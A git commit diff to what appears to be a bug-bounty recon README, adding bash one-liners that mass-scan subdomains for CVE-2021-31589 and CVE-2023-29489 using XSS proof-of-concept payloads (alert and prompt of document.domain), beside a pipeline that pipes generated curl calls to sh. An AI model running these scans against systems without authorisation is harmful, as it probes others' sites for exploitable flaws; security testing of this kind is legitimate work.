commit
308a962ad5
14
README.md
14
README.md
|
@ -72,6 +72,18 @@ puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt
|
|||
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
|
||||
```
|
||||
|
||||
### CVE-2021-31589
|
||||
|
||||
```bash
|
||||
cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done
|
||||
```
|
||||
|
||||
### CVE-2023-29489
|
||||
|
||||
```bash
|
||||
subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400
|
||||
```
|
||||
|
||||
### Clean list of host, port, and version
|
||||
|
||||
```bash
|
||||
|
@ -128,4 +140,4 @@ curl -XGET "https://api.sypse.com/v3/data/domain/subdomain?limit=100&offset=100&
|
|||
- [pikpikcu](https://twitter.com/sec715/status/1295216521501908992)
|
||||
- [gwen001](https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df)
|
||||
- [sazekodzeb](https://twitter.com/sazekodzeb/status/1535967868390711302)
|
||||
- [TheDarkSideOps](https://twitter.com/TheDarkSideOps/status/1310744404605501441)
|
||||
- [TheDarkSideOps](https://twitter.com/TheDarkSideOps/status/1310744404605501441)
|
||||
|
|
Loading…
Reference in New Issue